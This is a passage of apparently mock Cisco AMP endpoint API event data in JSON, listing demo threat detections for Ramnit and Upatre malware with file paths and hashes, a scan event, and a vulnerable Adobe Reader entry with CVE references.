Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6180331452157132816","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"opticare.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\opticare.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331452157133000,"timestamp":1610704827,"timestamp_nanoseconds":339000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6180331452157132815","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"opticare.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\opticare.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331452157133000,"timestamp":1610704827,"timestamp_nanoseconds":324000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"Win.Trojan.Upatre.tht.VRT","detection_id":"6180331452157132814","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"opticare.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\opticare.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331452157133000,"timestamp":1610704827,"timestamp_nanoseconds":293000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6180331452157132813","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"opticare.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\opticare.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331452157133000,"timestamp":1610704827,"timestamp_nanoseconds":293000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6180331452157132812","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"opticare.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\opticare.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331452157133000,"timestamp":1610704827,"timestamp_nanoseconds":293000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6180331452157132811","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"opticare.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\opticare.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331452157133000,"timestamp":1610704827,"timestamp_nanoseconds":246000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6180331452157132810","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"opticare.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\opticare.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331452157133000,"timestamp":1610704827,"timestamp_nanoseconds":168000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"Win.Trojan.Upatre.tht.VRT","detection_id":"6180331452157132809","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"opticare.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\opticare.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331452157133000,"timestamp":1610704827,"timestamp_nanoseconds":121000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"Win.Trojan.Upatre.tht.VRT","detection_id":"6180331452157132808","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"opticare.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\opticare.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663781681758000,"timestamp":1610704827,"timestamp_nanoseconds":407000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663781681758218","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"qdcuuckk.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Local Settings\\Application Data\\iwkikcbw\\qdcuuckk.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c"},"parent":{"process_id":4028,"disposition":"Clean","file_name":"svchost.exe","identity":{"sha256":"2910ebc692d833d949bfd56059e8106d324a276d5f165f874f3fb1b6c613cdd5","sha1":"49083ae3725a0488e0a8fbbe1335c745f70c4667","md5":"27c6d03bcdb8cfeb96b716f3d8be3e18"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663781681758000,"timestamp":1610704827,"timestamp_nanoseconds":345000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663781681758217","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Ramnit.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\Ramnit.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663781681758000,"timestamp":1610704827,"timestamp_nanoseconds":298000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663781681758216","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"qdcuuckk.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Start Menu\\Programs\\Startup\\qdcuuckk.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"},"parent":{"process_id":4028,"disposition":"Clean","file_name":"svchost.exe","identity":{"sha256":"2910ebc692d833d949bfd56059e8106d324a276d5f165f874f3fb1b6c613cdd5","sha1":"49083ae3725a0488e0a8fbbe1335c745f70c4667","md5":"27c6d03bcdb8cfeb96b716f3d8be3e18"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663781681758000,"timestamp":1610704827,"timestamp_nanoseconds":267000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663781681758215","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Ramnit.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\Ramnit.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663781681758000,"timestamp":1610704827,"timestamp_nanoseconds":189000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663781681758214","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Ramnit.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\Ramnit.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663781681758000,"timestamp":1610704827,"timestamp_nanoseconds":173000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663781681758213","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Ramnit.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\Ramnit.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"},"parent":{"process_id":1604,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455","sha1":"9d2bf84874abc5b6e9a2744b7865c193c08d362f","md5":"12896823fb95bfb3dc9b46bcaedc9923"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663781681758000,"timestamp":1610704827,"timestamp_nanoseconds":17000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663781681758212","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Ramnit.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\Ramnit.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663777386791000,"timestamp":1610704826,"timestamp_nanoseconds":970000000,"date":"2021-01-15T10:00:26+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663777386790915","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"iiwswemtokwvoomr.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Local Settings\\Temp\\iiwswemtokwvoomr.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"},"parent":{"process_id":3996,"disposition":"Malicious","file_name":"Ramnit.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663777386791000,"timestamp":1610704826,"timestamp_nanoseconds":939000000,"date":"2021-01-15T10:00:26+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663777386790914","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Ramnit.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\Ramnit.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6532892411109048000,"timestamp":1610704826,"timestamp_nanoseconds":487000000,"date":"2021-01-15T10:00:26+00:00","event_type":"Scan Started","event_type_id":554696714,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f5:8f:96:c3:53:1c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan"}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1490719361000000300,"timestamp":1610704823,"timestamp_nanoseconds":0,"date":"2021-01-15T10:00:23+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610704823,"start_date":"2021-01-15T10:00:23+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"AcroRd32.exe","identity":{"sha256":"825b7b20a913f26641c012f1cb61b81d29033f142ba6c6734425de06432e4f82"}},"vulnerabilities":[{"name":"Adobe Acrobat 
Reader","version":"9.3.3.177","cve":"CVE-2013-3346","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3346"},{"cve":"CVE-2013-2729","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2729"},{"cve":"CVE-2013-3342","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3342"},{"cve":"CVE-2013-3341","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3341"},{"cve":"CVE-2013-2718","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2718"},{"cve":"CVE-2013-2719","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2719"},{"cve":"CVE-2013-2720","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2720"},{"cve":"CVE-2013-2721","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2721"},{"cve":"CVE-2013-2722","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2722"},{"cve":"CVE-2013-2723","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2723"},{"cve":"CVE-2013-2724","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2724"},{"cve":"CVE-2013-2725","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2725"},{"cve":"CVE-2013-2726","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2726"},{"cve":"CVE-2013-2727","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2727"},{"cve":"CVE-2013-2730","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2730"},{"cve":"CVE-2013-2731","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2731"},{"cve":"CVE-2013-2732","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2732"},{"cve":"CVE-2013-2733","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2733"},{"cve":"CVE-2013-2735","score":10,"url":"https://web.nvd.nist.g
